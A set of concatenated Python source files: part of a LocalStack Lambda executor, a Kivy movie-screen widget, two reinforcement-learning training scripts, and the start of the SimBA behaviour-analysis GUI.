container_name = self.get_container_name(func_arn)
if status == 1:
LOG.debug("Stopping container: %s" % container_name)
DOCKER_CLIENT.stop_container(container_name)
status = self.get_docker_container_status(func_arn)
if status == -1:
LOG.debug("Removing container: %s" % container_name)
rm_docker_container(container_name, safe=True)
# clean up function invoke times, as some init logic depends on this
self.function_invoke_times.pop(func_arn, None)
def get_all_container_names(self):
"""
Returns a list of container names for lambda containers.
:return: A String[] localstack docker container names for each function.
"""
with self.docker_container_lock:
LOG.debug("Getting all lambda containers names.")
list_result = DOCKER_CLIENT.list_containers(filter="name=localstack_lambda_*")
container_names = list(map(lambda container: container["name"], list_result))
return container_names
def destroy_existing_docker_containers(self):
"""
Stops and/or removes all lambda docker containers for localstack.
:return: None
"""
with self.docker_container_lock:
container_names = self.get_all_container_names()
LOG.debug("Removing %d containers." % len(container_names))
for container_name in container_names:
DOCKER_CLIENT.remove_container(container_name)
def get_docker_container_status(self, func_arn):
"""
Determine the status of a docker container.
:param func_arn: The ARN of the lambda function.
:return: 1 If the container is running,
-1 if the container exists but is not running
0 if the container does not exist.
"""
with self.docker_container_lock:
# Get the container name and id.
container_name = self.get_container_name(func_arn)
container_status = DOCKER_CLIENT.get_container_status(container_name)
return container_status.value
def get_docker_container_network(self, func_arn):
"""
Determine the network of a docker container.
:param func_arn: The ARN of the lambda function.
:return: name of the container network
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
# container does not exist
if status == 0:
return ""
# Get the container name.
container_name = self.get_container_name(func_arn)
container_network = DOCKER_CLIENT.get_network(container_name)
return container_network
def idle_container_destroyer(self):
"""
Iterates though all the lambda containers and destroys any container that has
been inactive for longer than MAX_CONTAINER_IDLE_TIME_MS.
:return: None
"""
LOG.debug("Checking if there are idle containers ...")
current_time = int(time.time() * 1000)
for func_arn, last_run_time in dict(self.function_invoke_times).items():
duration = current_time - last_run_time
# not enough idle time has passed
if duration < MAX_CONTAINER_IDLE_TIME_MS:
continue
# container has been idle, destroy it.
self.destroy_docker_container(func_arn)
def start_idle_container_destroyer_interval(self):
"""
Starts a repeating timer that triggers start_idle_container_destroyer_interval every 60 seconds.
Thus checking for idle containers and destroying them.
:return: None
"""
self.idle_container_destroyer()
threading.Timer(60.0, self.start_idle_container_destroyer_interval).start()
def get_container_name(self, func_arn):
"""
Given a function ARN, returns a valid docker container name.
:param func_arn: The ARN of the lambda function.
:return: A docker compatible name for the arn.
"""
return "localstack_lambda_" + re.sub(r"[^a-zA-Z0-9_.-]", "_", func_arn)
class LambdaExecutorSeparateContainers(LambdaExecutorContainers):
def __init__(self):
super(LambdaExecutorSeparateContainers, self).__init__()
self.max_port = LAMBDA_API_UNIQUE_PORTS
self.port_offset = LAMBDA_API_PORT_OFFSET
def prepare_event(self, environment: Dict, event_body: str) -> bytes:
# Tell Lambci to use STDIN for the event
environment["DOCKER_LAMBDA_USE_STDIN"] = "1"
return event_body.encode()
def execute_in_container(
self, func_details, env_vars, command, docker_flags=None, stdin=None, background=False
) -> Tuple[bytes, bytes]:
lambda_cwd = func_details.cwd
handler = func_details.handler
entrypoint = None
if command:
entrypoint = ""
elif handler:
command = handler
else:
command = None
# add Docker Lambda env vars
network = config.LAMBDA_DOCKER_NETWORK or None
if network == "host":
port = get_free_tcp_port()
env_vars["DOCKER_LAMBDA_API_PORT"] = port
env_vars["DOCKER_LAMBDA_RUNTIME_PORT"] = port
additional_flags = docker_flags or ""
dns = config.LAMBDA_DOCKER_DNS
docker_java_ports = PortMappings()
if Util.debug_java_port:
docker_java_ports.add(Util.debug_java_port)
docker_image = Util.docker_image_for_lambda(func_details)
if config.LAMBDA_REMOTE_DOCKER:
container_id = DOCKER_CLIENT.create_container(
image_name=docker_image,
interactive=True,
entrypoint=entrypoint,
remove=True,
network=network,
env_vars=env_vars,
dns=dns,
additional_flags=additional_flags,
ports=docker_java_ports,
command=command,
)
DOCKER_CLIENT.copy_into_container(container_id, f"{lambda_cwd}/.", DOCKER_TASK_FOLDER)
return DOCKER_CLIENT.start_container(
container_id, interactive=not background, attach=not background, stdin=stdin
)
else:
mount_volumes = None
if lambda_cwd:
mount_volumes = [
(Util.get_host_path_for_path_in_docker(lambda_cwd), DOCKER_TASK_FOLDER)
]
return DOCKER_CLIENT.run_container(
image_name=docker_image,
interactive=True,
detach=background,
entrypoint=entrypoint,
remove=True,
network=network,
env_vars=env_vars,
dns=dns,
additional_flags=additional_flags,
command=command,
mount_volumes=mount_volumes,
stdin=stdin,
)
class LambdaExecutorLocal(LambdaExecutor):
def _execute_in_custom_runtime(self, cmd: str, func_details=None) -> InvocationResult:
"""
Generic run function for executing lambdas in custom runtimes.
:param cmd: the command to execute
:param func_details: function details
:return: the InvocationResult
"""
env_vars = func_details and func_details.envvars
kwargs = {"stdin": True, "inherit_env": True, "asynchronous": True, "env_vars": env_vars}
process = run(cmd, stderr=subprocess.PIPE, outfile=subprocess.PIPE, **kwargs)
result, log_output = process.communicate()
try:
result = to_str(result).strip()
except Exception:
pass
log_output = to_str(log_output).strip()
return_code = process.returncode
# Note: The user's code may have been logging to stderr, in which case the logs
# will be part of the "result" variable here. Hence, make sure that we extract
# only the *last* line of "result" and consider anything above that as log output.
# TODO: not sure if this code is needed/used
if isinstance(result, str) and "\n" in result:
lines = result.split("\n")
idx = last_index_of(
lines, lambda line: line and not line.startswith(INTERNAL_LOG_PREFIX)
)
if idx >= 0:
result = lines[idx]
additional_logs = "\n".join(lines[:idx] + lines[idx + 1 :])
log_output += "\n%s" % additional_logs
log_formatted = log_output.strip().replace("\n", "\n> ")
func_arn = func_details and func_details.arn()
LOG.debug(
"Lambda %s result / log output:\n%s\n> %s" % (func_arn, result.strip(), log_formatted)
)
# store log output - TODO get live logs from `process` above?
_store_logs(func_details, log_output)
if return_code != 0:
raise InvocationException(
"Lambda process returned error status code: %s. Result: %s. Output:\n%s"
% (return_code, result, log_output),
log_output,
result,
)
invocation_result = InvocationResult(result, log_output=log_output)
return invocation_result
def _execute(
self, func_arn, func_details, event, context=None, version=None
) -> InvocationResult:
lambda_cwd = func_details.cwd
environment = self._prepare_environment(func_details)
if func_details.timeout:
environment["AWS_LAMBDA_FUNCTION_TIMEOUT"] = str(func_details.timeout)
if context:
environment["AWS_LAMBDA_FUNCTION_NAME"] = context.function_name
environment["AWS_LAMBDA_FUNCTION_VERSION"] = context.function_version
environment["AWS_LAMBDA_FUNCTION_INVOKED_ARN"] = context.invoked_function_arn
environment["AWS_LAMBDA_FUNCTION_MEMORY_SIZE"] = str(context.memory_limit_in_mb)
# execute the Lambda function in a forked sub-process, sync result via queue
queue = Queue()
lambda_function = func_details.function(version)
def do_execute():
# now we're executing in the child process, safe to change CWD and ENV
result = None
try:
if lambda_cwd:
os.chdir(lambda_cwd)
sys.path.insert(0, "")
if environment:
os.environ.update(environment)
# set default env variables required for most Lambda handlers
self.set_default_env_variables()
# run the actual handler function
result = lambda_function(event, context)
except Exception as e:
result = str(e)
sys.stderr.write("%s %s" % (e, traceback.format_exc()))
raise
finally:
queue.put(result)
process = Process(target=do_execute)
start_time = now(millis=True)
error = None
with CaptureOutput() as c:
try:
process.run()
except Exception as e:
error = e
result = queue.get()
end_time = now(millis=True)
# Make sure to keep the log line below, to ensure the log stream gets created
request_id = long_uid()
log_output = 'START %s: Lambda %s started via "local" executor ...' % (
request_id,
func_arn,
)
# TODO: Interweaving stdout/stderr currently not supported
for stream in (c.stdout(), c.stderr()):
if stream:
log_output += ("\n" if log_output else "") + stream
log_output += "\nEND RequestId: %s" % request_id
log_output += "\nREPORT RequestId: %s Duration: %s ms" % (
request_id,
int((end_time - start_time) * 1000),
)
# store logs to CloudWatch
_store_logs(func_details, log_output)
result = result.result if isinstance(result, InvocationResult) else result
if error:
LOG.info(
'Error executing Lambda "%s": %s %s'
% (func_arn, error, "".join(traceback.format_tb(error.__traceback__)))
)
raise InvocationException(result, log_output)
invocation_result = InvocationResult(result, log_output=log_output)
return invocation_result
def provide_file_to_lambda(self, local_file: str, inv_context: InvocationContext) -> str:
# This is a no-op for local executors - simply return the given local file path
return local_file
def execute_java_lambda(self, event, context, main_file, func_details=None):
func_details.envvars = func_details.envvars or {}
java_opts = config.LAMBDA_JAVA_OPTS or ""
handler = func_details.handler
func_details.envvars[LAMBDA_HANDLER_ENV_VAR_NAME] = handler
event_file = EVENT_FILE_PATTERN.replace("*", short_uid())
save_file(event_file, json.dumps(json_safe(event)))
TMP_FILES.append(event_file)
classpath = "%s:%s:%s" % (
main_file,
Util.get_java_classpath(main_file),
LAMBDA_EXECUTOR_JAR,
)
cmd = "java %s -cp %s %s %s" % (
java_opts,
classpath,
LAMBDA_EXECUTOR_CLASS,
event_file,
)
# apply plugin patches
inv_context = InvocationContext(
func_details, event, environment=func_details.envvars, lambda_command=cmd
)
self.apply_plugin_patches(inv_context)
cmd = inv_context.lambda_command
LOG.info(cmd)
# execute Lambda and get invocation result
invocation_result = self._execute_in_custom_runtime(cmd, func_details=func_details)
# run plugins post-processing logic
invocation_result = self.process_result_via_plugins(inv_context, invocation_result)
return invocation_result
def execute_javascript_lambda(self, event, context, main_file, func_details=None):
handler = func_details.handler
function = handler.split(".")[-1]
event_json_string = "%s" % (json.dumps(json_safe(event)) if event else "{}")
context_json_string = "%s" % (json.dumps(context.__dict__) if context else "{}")
cmd = (
"node -e 'require(\"%s\").%s(%s,%s).then(r => process.stdout.write(JSON.stringify(r)))'"
% (
main_file,
function,
event_json_string,
context_json_string,
)
)
LOG.info(cmd)
result = self._execute_in_custom_runtime(cmd, func_details=func_details)
return result
@staticmethod
def set_default_env_variables():
# set default env variables required for most Lambda handlers
default_env_vars = {"AWS_DEFAULT_REGION": aws_stack.get_region()}
env_vars_before = {var: os.environ.get(var) for var in default_env_vars}
os.environ.update({k: v for k, v in default_env_vars.items() if not env_vars_before.get(k)})
return env_vars_before
@staticmethod
def reset_default_env_variables(env_vars_before):
for env_name, env_value in env_vars_before.items():
env_value_before = env_vars_before.get(env_name)
os.environ[env_name] = env_value_before or ""
if env_value_before is None:
os.environ.pop(env_name, None)
def execute_go_lambda(self, event, context, main_file, func_details=None):
event_json_string = "%s" % (json.dumps(event) if event else "{}")
cmd = "AWS_LAMBDA_FUNCTION_HANDLER=%s AWS_LAMBDA_EVENT_BODY='%s' %s" % (
main_file,
event_json_string,
GO_LAMBDA_RUNTIME,
)
LOG.info(cmd)
result = self._execute_in_custom_runtime(cmd, func_details=func_details)
return result
class Util:
debug_java_port = False
@classmethod
def get_java_opts(cls):
opts = config.LAMBDA_JAVA_OPTS or ""
# Replace _debug_port_ with a random free port
if "_debug_port_" in opts:
if not cls.debug_java_port:
cls.debug_java_port = get_free_tcp_port()
opts = opts.replace("_debug_port_", ("%s" % cls.debug_java_port))
else:
# Parse the debug port from opts
m = re.match(".*address=(.+:)?(\\d+).*", opts)
if m is not None:
cls.debug_java_port = m.groups()[1]
return opts
@classmethod
def get_host_path_for_path_in_docker(cls, path):
return re.sub(r"^%s/(.*)$" % config.TMP_FOLDER, r"%s/\1" % config.HOST_TMP_FOLDER, path)
@classmethod
def format_windows_path(cls, path):
temp = path.replace(":", "").replace("\\", "/")
if len(temp) >= 1 and temp[:1] != "/":
temp = "/" + temp
temp = "%s%s" % (config.WINDOWS_DOCKER_MOUNT_PREFIX, temp)
return temp
@classmethod
def docker_image_for_lambda(cls, func_details):
runtime = func_details.runtime or ""
if func_details.code.get("ImageUri"):
LOG.warning(
"ImageUri is set: Using Lambda container images is only supported in LocalStack Pro"
)
docker_tag = runtime
docker_image = config.LAMBDA_CONTAINER_REGISTRY
# TODO: remove prefix once execution issues are fixed with dotnetcore/python lambdas
# See https://github.com/lambci/docker-lambda/pull/218
lambdas_to_add_prefix = [
"dotnetcore2.0",
"dotnetcore2.1",
"python3.6",
"python3.7",
]
if docker_image == "lambci/lambda" and any(
img in docker_tag for img in lambdas_to_add_prefix
):
docker_tag = "20191117-%s" % docker_tag
if runtime == "nodejs14.x":
# TODO temporary fix until lambci image for nodejs14.x becomes available
docker_image = "localstack/lambda-js"
return "%s:%s" % (docker_image, docker_tag)
@classmethod
def get_java_classpath(cls, archive):
"""
Return the Java classpath, using the parent folder of the
given archive as the base folder.
The result contains any *.jar files in the base folder, as
well as any JAR files in the "lib/*" subfolder living
alongside the supplied java archive (.jar or .zip).
:param archive: an absolute path to a .jar or .zip Java archive
:return: the Java classpath, relative to the base dir of "archive"
"""
entries = ["."]
base_dir = os.path.dirname(archive)
for pattern in ["%s/*.jar", "%s/lib/*.jar", "%s/java/lib/*.jar", "%s/*.zip"]:
for entry in glob.glob(pattern % base_dir):
if os.path.realpath(archive) != os.path.realpath(entry):
entries.append(os.path.relpath(entry, base_dir))
# make sure to append the localstack-utils.jar at the end of the classpath
# https://github.com/localstack/localstack/issues/1160
entries.append(os.path.relpath(archive, base_dir))
entries.append("*.jar")
entries.append("java/lib/*.jar")
result = ":".join(entries)
return result
@staticmethod
def mountable_tmp_file():
f = os.path.join(config.TMP_FOLDER, short_uid())
TMP_FILES.append(f)
return f
@staticmethod
def inject_endpoints_into_env(env_vars: Dict[str, str]):
env_vars = env_vars or {}
main_endpoint = get_main_endpoint_from_container()
if not env_vars.get("LOCALSTACK_HOSTNAME"):
env_vars["LOCALSTACK_HOSTNAME"] = main_endpoint
if not env_vars.get("AWS_ENDPOINT_URL"):
# Note that $AWS_ENDPOINT_URL is currently not (yet) supported by AWS, but we
# can use it to ship patched Lambda runtimes that can interpret this config.
env_vars["AWS_ENDPOINT_URL"] = config.get_edge_url(
localstack_hostname=main_endpoint, protocol="http"
)
return env_vars
# --------------
# GLOBAL STATE
# --------------
EXECUTOR_LOCAL = LambdaExecutorLocal()
EXECUTOR_CONTAINERS_SEPARATE = LambdaExecutorSeparateContainers()
EXECUTOR_CONTAINERS_REUSE = LambdaExecutorReuseContainers()
DEFAULT_EXECUTOR = EXECUTOR_CONTAINERS_SEPARATE
# the keys of AVAILABLE_EXECUTORS map to the LAMBDA_EXECUTOR config variable
AVAILABLE_EXECUTORS = {
"local": EXECUTOR_LOCAL,
"docker": EXECUTOR_CONTAINERS_SEPARATE,
"docker-reuse": EXECUTOR_CONTAINERS_REUSE,
}
|
moviescreen.py
|
import cfg
from kivy.uix.screenmanager import Screen
from kivy.lang import Builder
from kivy.properties import *
import ytvApi as ytv
from threading import Thread
Builder.load_string('''
<MovieScreen>:
name:'moviescreen'
MDBoxLayout:
orientation:'vertical'
spacing:dp(10)
MDBoxLayout:
size_hint:1,None
MDIconButton:
icon:"arrow-left-bold"
on_release:root.close_screen()
MDLabel:
size_hint:1,None
halign:'center'
markup:True
font_name:'fonts/title'
text:'[b][u]'+root.title
MDIconButton:
id:add_bk
icon:
on_release:root.bookmark()
MDBoxLayout:
size_hint_y:.4
canvas.before:
Color:
rgba:app.theme_cls.primary_dark[:-1]+[.2]
RoundedRectangle:
size:self.size
pos: self.pos
LoadImg:
id:loadimg
Image:
id:thumb
allow_stretch:True
keep_ratio: True
source:
nocache:True
ScrollView:
id:info_scroll_view
#bar_pos_y:'left'
bar_width:dp(5)
bar_inactive_color:.7,.7,.7,.4
padding:dp(10)
MDLabel:
canvas.before:
Color:
rgba:0,0,0,.2
RoundedRectangle:
size:self.size
pos: self.pos
id:info
text:root.info
font_name:'fonts/movie_info'
font_style: 'Subtitle1'
valign:'top'
size_hint_y:None
height:self.texture_size[1]
ScreenManager:
id:sm
SeasonScreen:
id:ss
FormatScreen:
id:fs
''')
class MovieScreen(Screen):
movie=ObjectProperty()
title=StringProperty('Loading...')
info=StringProperty('Loading...')
def on_enter(self,*a):
if self.movie.info and not cfg.doCaptcha:
bk=ytv.BookMarks()
self.ids.add_bk.icon='star' if bk.is_bk(self.movie.name) else 'star-outline'
self.ids.thumb.texture=self.movie.img_texture
self.title=t=self.movie.name
cfg.history_entry.append(t)
self.info=self.movie.info
#self.ids.sm.clear_widgets()
Thread(target=self.get_seasons,daemon=True).start()
elif cfg.doCaptcha==True:
cfg.doCaptcha=False
def bookmark(self,*a):
bk=ytv.BookMarks()
from kivymd.toast import toast
if self.ids.add_bk.icon=='star':
self.ids.add_bk.icon='star-outline'
bk.del_bk(self.movie.name)
cfg.BOOKTAB.sync()
toast(f'Bookmark removed ')
else :
self.ids.add_bk.icon='star'
self.movie.bookmark()
cfg.b_seasons[self.movie.name]=self.movie
cfg.BOOKTAB.sync()
toast(f'Bookmark added')
def get_seasons(self,*a):
s=self.movie.get_seasons()
self.ids.sm.get_screen('season_screen').seasons=s
self.ids.sm.current='season_screen'
def close_screen(self,*a):
self.ids.sm.current='season_screen'
#self.ids.sm.get_screen('season_screen').kill()
self.manager.current='tmscreen'
def on_pre_leave(self,*a):
self.ids.info_scroll_view.scroll_y=1
def on_leave(self,*a):
cfg.BOOKTAB.bug=True
cfg.BOOKTAB.sync()
if not cfg.doCaptcha:
self.ids.ss.kill()
self.ids.thumb.texture=None
self.title='Loading'
self.info='Loading'
cfg.history_entry=[]
#self.ids.info_scroll_view.scroll_y=1
|
train_A3C.py
|
import argparse
import itertools
import os
import threading
import time
import tensorflow as tf
from atari_env import A_DIM
from atari_env import S_DIM
from atari_env import make_env
from evaluate import Evaluate
from net import Net
from utils import print_params_nums
from worker import Worker
def main(args):
if args.save_path is not None and not os.path.exists(args.save_path):
os.makedirs(args.save_path)
summary_writer = tf.summary.FileWriter(os.path.join(args.save_path, 'log'))
global_steps_counter = itertools.count() # thread-safe
global_net = Net(S_DIM, A_DIM, 'global', args)
num_workers = args.threads
workers = []
# create workers
for i in range(1, num_workers + 1):
worker_summary_writer = summary_writer if i == 0 else None
worker = Worker(i, make_env(args), global_steps_counter,
worker_summary_writer, args)
workers.append(worker)
saver = tf.train.Saver(max_to_keep=5)
with tf.Session() as sess:
coord = tf.train.Coordinator()
if args.model_path is not None:
print('Loading model...\n')
ckpt = tf.train.get_checkpoint_state(args.model_path)
saver.restore(sess, ckpt.model_checkpoint_path)
else:
print('Initializing a new model...\n')
sess.run(tf.global_variables_initializer())
print_params_nums()
# Start work process for each worker in a separated thread
worker_threads = []
for worker in workers:
t = threading.Thread(target=lambda: worker.run(sess, coord, saver))
t.start()
time.sleep(0.5)
worker_threads.append(t)
if args.eval_every > 0:
evaluator = Evaluate(
global_net, summary_writer, global_steps_counter, args)
evaluate_thread = threading.Thread(
target=lambda: evaluator.run(sess, coord))
evaluate_thread.start()
coord.join(worker_threads)
def args_parse():
parser = argparse.ArgumentParser()
parser.add_argument(
'--model_path', default=None, type=str,
help='Whether to use a saved model. (*None|model path)')
parser.add_argument(
'--save_path', default='/tmp/a3c', type=str,
help='Path to save a model during training.')
parser.add_argument(
'--max_steps', default=int(1e8), type=int, help='Max training steps')
parser.add_argument(
'--start_time', default=None, type=str, help='Time to start training')
parser.add_argument(
'--threads', default=16, type=int,
help='Numbers of parallel threads. [num_cpu_cores] by default')
# evaluate
parser.add_argument(
'--eval_every', default=500, type=int,
help='Evaluate the global policy every N seconds')
parser.add_argument(
'--record_video', default=True, type=bool,
help='Whether to save videos when evaluating')
parser.add_argument(
'--eval_episodes', default=5, type=int,
help='Numbers of episodes per evaluation')
# hyperparameters
parser.add_argument(
'--init_learning_rate', default=7e-4, type=float,
help='Learning rate of the optimizer')
parser.add_argument(
'--decay', default=0.99, type=float,
help='decay factor of the RMSProp optimizer')
parser.add_argument(
'--smooth', default=1e-7, type=float,
help='epsilon of the RMSProp optimizer')
parser.add_argument(
'--gamma', default=0.99, type=float,
help='Discout factor of reward and advantages')
parser.add_argument('--tmax', default=5, type=int, help='Rollout size')
parser.add_argument(
'--entropy_ratio', default=0.01, type=float,
help='Initial weight of entropy loss')
parser.add_argument(
'--clip_grads', default=40, type=float,
help='global norm gradients clipping')
parser.add_argument(
'--epsilon', default=1e-5, type=float,
help='epsilon of rmsprop optimizer')
return parser.parse_args()
if __name__ == '__main__':
# ignore warnings by tensorflow
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
# make GPU invisible
os.environ['CUDA_VISIBLE_DEVICES'] = ''
args = args_parse()
main(args)
|
Main.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from multiprocessing import Process
from init import Settings
def utilityThread(settings, sess, saver, globalEpisodes, coord):
import time
lastSave = sess.run(globalEpisodes)
while not coord.should_stop():
episodeNumber = sess.run(globalEpisodes)
print("|| __ {} __ || Global episodes: {} ||".format(settings.activity, sess.run(globalEpisodes)))
if (episodeNumber > 5000 + lastSave and settings.saveCheckpoint):
print("UtilityThread is saving the model!")
saver.save(sess, settings.tfGraphPath, episodeNumber)
lastSave = episodeNumber
if (episodeNumber > settings.trainingEpisodes):
print("Training done is done!!!!")
coord.request_stop()
time.sleep(2) # This function needs little CPU time
if (settings.saveCheckpoint):
print("Program is terminating, saving the model!")
saver.save(sess, settings.tfGraphPath, sess.run(globalEpisodes))
def run(settings = Settings()):
import tensorflow as tf
import os
from ACNetwork import ACNetwork
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
config = tf.ConfigProto()
#config.gpu_options.allow_growth = True
#config.gpu_options.per_process_gpu_memory_fraction = 1.0
with tf.Session() as sess:
globalEpisodes = tf.Variable(0, dtype=tf.int32, name='global_episodes', trainable=False)
globalNetwork = ACNetwork(settings, "global")
coord = tf.train.Coordinator()
trainers, workers, games = setupConcurrency(settings, sess, coord, globalEpisodes)
saver = tf.train.Saver(max_to_keep=1, keep_checkpoint_every_n_hours=2)
if settings.loadCheckpoint:
saver.restore(sess, settings.tfCheckpoint)
else:
sess.run(tf.global_variables_initializer())
for thread in trainers:
thread.start()
for thread in workers:
thread.start()
for process in games:
process.start()
utilityThread(settings, sess, saver, globalEpisodes, coord)
for game in games:
game.terminate()
def setupConcurrency(settings, sess, coord, globalEpisodes):
from queue import Queue
from multiprocessing import Queue as PQueue
import Concurrency
from Worker import Worker
from Trainer import Trainer
trainingQueues = []
trainerThreads = []
for i in range(settings.trainerThreads):
queue = Queue(100)
trainingQueues.append(queue)
trainerThreads.append(Concurrency.TrainerRunner(coord, queue))
gameDataQueues = []
workerThreads = []
for i in range(settings.workerThreads):
gameDataQueue = PQueue(100)
gameDataQueues.append(gameDataQueue)
workerThreads.append(Concurrency.WorkerRunner(coord, gameDataQueue))
gameProcesses = []
for i in range(settings.gameProcesses):
gameProcesses.append(Concurrency.GameRunner(settings))
trainers = []
for i in range(settings.trainers):
trainer = Trainer(settings, sess, i, coord, globalEpisodes)
trainers.append(trainer)
trainerThreads[i % len(trainerThreads)].addTrainer(trainer)
for i in range(settings.workers):
playerActionQueue = PQueue(100)
queues = {"trainer": trainingQueues[i%len(trainingQueues)],
"gameData": gameDataQueue,
"playerAction": playerActionQueue}
trainer = trainers[i%len(trainers)]
worker = Worker(settings, sess, i, trainer.number, trainer.localAC, queues, coord)
workerThreads[i % len(workerThreads)].addWorker(worker)
gameProcesses[i % len(gameProcesses)].addGame(gameDataQueues[i % len(gameDataQueues)], playerActionQueue)
return trainerThreads, workerThreads, gameProcesses
def startProcess(settings):
settings.generateActivity()
settings.generatePaths()
process = Process(target=run, args=(settings,))
process.start()
return process
def main():
conf = Settings()
trainingSession = startProcess(conf)
trainingSession.join()
if __name__ == "__main__":
main()
|
SimBA.py
|
import warnings
warnings.filterwarnings('ignore',category=FutureWarning)
warnings.filterwarnings('ignore',category=DeprecationWarning)
import os
import time
import subprocess
import itertools
#import deeplabcut
import csv
import sys
from tkinter import *
from tkinter.filedialog import askopenfilename,askdirectory
from tkinter import tix, messagebox
import subprocess
import platform
import shutil
from tabulate import tabulate
from configparser import ConfigParser, NoSectionError, NoOptionError, MissingSectionHeaderError
from PIL import Image, ImageTk
import tkinter.ttk as ttk
import webbrowser
import cv2
from simba.plotly_create_h5 import *
from simba.dlc_change_yamlfile import *
from simba.tkinter_functions import *
from simba.create_project_ini import write_inifile
from simba.json2csv import json2csv_file, json2csv_folder
from simba.run_RF_model import rfmodel
from simba.prob_graph import *
from simba.runmodel_1st import *
from simba.path_plot import path_plot_config
from simba.gantt import ganntplot_config
from simba.data_plot import data_plot_config
from simba.line_plot import line_plot_config
from simba.import_videos_csv_project_ini import *
from simba.labelling_aggression import *
from simba.pseudoLabel import semisuperviseLabel
from simba.load_labelling_aggression import load_folder
from simba.get_coordinates_tools_v2 import get_coordinates_nilsson
from simba.process_data_log import analyze_process_data_log
from simba.process_severity import analyze_process_severity
from simba.extract_seqframes import *
from simba.classifierValidation import validate_classifier
from simba.train_multiple_models_from_meta import *
from simba.train_model_2 import *
from simba.multiplecrop import *
from simba.extract_frames_fast import *
from simba.rw_dfs import *
from simba.validate_model_on_single_video import *
from simba.ROI_freehand_draw_3 import roiFreehand
from simba.ROI_analysis_2 import *
from simba.ROI_plot import *
from simba.ROI_draw_defined import *
from simba.ROI_multiply import *
from simba.ROI_reset import *
from simba.ROI_add_to_features import *
from simba.ROI_process_movement import *
from simba.ROI_visualize_features import ROItoFeaturesViz
from simba.plot_heatmap import plotHeatMap
from simba.append_boris import *
from simba.outlier_scripts.movement.correct_devs_mov_16bp import dev_move_16
from simba.outlier_scripts.location.correct_devs_loc_16bp import dev_loc_16
from simba.outlier_scripts.movement.correct_devs_mov_user_defined import dev_move_user_defined
from simba.outlier_scripts.location.correct_devs_loc_user_defined import dev_loc_user_defined
from simba.outlier_scripts.movement.correct_devs_mov_14bp import dev_move_14
from simba.outlier_scripts.location.correct_devs_loc_14bp import dev_loc_14
from simba.outlier_scripts.skip_outlierCorrection import skip_outlier_c
from simba.features_scripts.extract_features_16bp import extract_features_wotarget_16
from simba.features_scripts.extract_features_14bp import extract_features_wotarget_14
from simba.features_scripts.extract_features_14bp_from_16bp import extract_features_wotarget_14_from_16
from simba.features_scripts.extract_features_9bp import extract_features_wotarget_9
from simba.features_scripts.extract_features_8bp import extract_features_wotarget_8
from simba.features_scripts.extract_features_7bp import extract_features_wotarget_7
from simba.features_scripts.extract_features_4bp import extract_features_wotarget_4
from simba.features_scripts.extract_features_user_defined import extract_features_wotarget_user_defined
from simba.sklearn_plot_scripts.plot_sklearn_results_2 import plotsklearnresult
from simba.sklearn_plot_scripts.plot_sklearn_results_2_single import plotsklearnresultsingle
from simba.drop_bp_cords import define_bp_drop_down,reverse_dlc_input_files
from simba.drop_bp_cords import bodypartConfSchematic
from simba.define_new_pose_config import define_new_pose_configuration
# from simba.dpk_create_project_ini import write_dpkfile
# from simba.dpk_script.create_annotation_set import createAnnotationSet
# from simba.dpk_script.annotator import dpkAnnotator
# from simba.dpk_script.train_model import trainDPKmodel
# from simba.dpk_script.Predict_new_video import predictnewvideoDPK
# from simba.dpk_script.Visualize_video import visualizeDPK
from simba.reset_poseConfig import reset_DiagramSettings
from simba.plot_threshold import plot_threshold
from simba.merge_frames_movie import mergeframesPlot
from simba.plot_heatmap_location_new import plotHeatMapLocation
from simba.appendMars import append_dot_ANNOTT
from simba.read_DLCmulti_h5_function import importMultiDLCpose
from simba.sleap_bottom_up_convert import importSLEAPbottomUP
from simba.timeBins_movement import time_bins_movement
from simba.timeBins_classifiers import time_bins_classifier
from simba.ez_lineplot import draw_line_plot,draw_line_plot_tools
from simba.append_boris import append_Boris_annot
from simba.ROI_directionality_to_other_animals import *
from simba.ROI_directionality_to_other_animals_visualize import *
from simba.import_solomon import solomonToSimba
from simba.reverse_tracking_order import reverse_tracking_2_animals
from simba.Kleinberg_burst_analysis import run_kleinberg
from simba.FSTCC import FSTCC_perform
from simba.pup_retrieval_1 import pup_retrieval_1
import urllib.request
from cefpython3 import cefpython as cef
import threading
import datetime
import platform
import atexit
simBA_version = 1.2
currentPlatform = platform.system()
if currentPlatform == 'Linux'or (currentPlatform == 'Darwin'):
from simba.process_videos_automation_linux import *
if currentPlatform == 'Windows':
from simba.process_videos_automation_win import *
class roitableRow(Frame):
def __init__(self, parent =None ,dirname='',filename = '',widths = "" ,indexs='',projectini=''):
self.projectini = projectini
self.filename = os.path.join(dirname,filename)
Frame.__init__(self,master=parent)
var=StringVar()
self.index = Entry(self,textvariable=var,width=4)
var.set(indexs)
self.index.grid(row=0,column=0)
self.lblName = Label(self,text=filename,width =widths,anchor=W)
self.lblName.grid(row=0,column=1,sticky=W)
self.btnset = Button(self,text='Draw',command=self.draw)
self.btnset.grid(row=0,column=2)
self.btnreset = Button(self,text='Reset',command =self.reset)
self.btnreset.grid(row=0,column=3)
self.btnapplyall = Button(self, text='Apply to all', command=self.applyall)
self.btnapplyall.grid(row=0, column=4)
def draw(self):
roiFreehand(self.projectini,self.filename)
def reset(self):
ROI_reset(self.projectini, self.filename)
def applyall(self):
multiplyFreeHand(self.projectini, self.filename)
class roitableMenu:
def __init__(self,videofolder,inifile):
self.filesFound = []
self.row = []
self.videofolder = videofolder
### FIND FILES #####
for i in os.listdir(videofolder):
if i.endswith(('.avi', '.mp4', '.mov', 'flv')):
self.filesFound.append(i)
### longest string in list
maxname = max(self.filesFound, key=len)
## popup window
roimenu = Toplevel()
roimenu.minsize(500, 400)
roimenu.wm_title("ROI Table")
scroll = hxtScrollbar(roimenu)
tableframe = LabelFrame(scroll,text='Video Name',labelanchor=NW)
#### loop for tables######
for i in range(len(self.filesFound)):
self.row.append(roitableRow(tableframe, self.videofolder,str(self.filesFound[i]), str(len(maxname)),str(i+1)+'.',projectini=inifile))
self.row[i].grid(row=i + 1, sticky=W)
tableframe.grid(row=0)
class processvid_title(Frame):
def __init__(self,parent=None,widths="",color=None,shortenbox =None,downsambox =None,graybox=None,framebox=None,clahebox=None,**kw):
self.color = color if color is not None else 'black'
Frame.__init__(self,master=parent,**kw)
self.lblName = Label(self, text= 'Video Name',fg=str(self.color),width=int(widths)+5,font=("Helvetica",10,'bold'))
self.lblName.grid(row=0,column=0,sticky=W)
